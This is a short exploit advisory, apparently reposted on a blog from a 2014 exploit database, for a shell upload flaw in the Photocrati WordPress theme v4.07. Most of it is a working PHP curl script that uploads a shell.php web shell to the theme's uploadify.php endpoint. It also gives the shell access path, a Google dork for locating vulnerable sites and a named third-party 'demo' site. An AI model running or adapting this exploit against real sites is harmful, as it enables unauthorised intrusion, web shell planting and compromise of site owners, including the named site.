728x90
# Title : Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability # Author : Aloulou # Date : 13/05/2014 # Facebook : http://www.facebook.com/Aloulou.TN # Email: aloulou@alquds.com# Vendor : www.photocrati.com # Google Dork inurl:/wp-content/themes/photocrati-theme-v4.07/# Tested on : Linux ############################################################################Exploit: <?php $uploadfile="shell.php";$ch = curl_init("http://127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/uploadify.php");curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile",'folder'=>'/admin/scripts/'));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);curl_close($ch); print "$postResult";?>ShellAccess: http://127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/shell.phpDemo:http://www.tanguygilson.com# Greeting to : Tunisia , CyberPink , Brikovich , Anonboy ############################################################################# 2935E278AA2F72DF 1337day.com [2014-05-15] 0E88B39FD8DD85B4 # |
728x90
'Metasploit ' 카테고리의 다른 글
| Punking Pet Peeves with PowerShell (0) | 2014.05.17 |
|---|---|
| Broadcom PIPA C211 - Sensitive Information Disclosure (0) | 2014.05.16 |
| PayPal Filter Bypass (0) | 2014.05.15 |
| Adobe Flash Player Shader Buffer Overflow (0) | 2014.05.14 |
| Adobe Flash Player Shader Buffer Overflow(CVE-2014-0515) (0) | 2014.05.13 |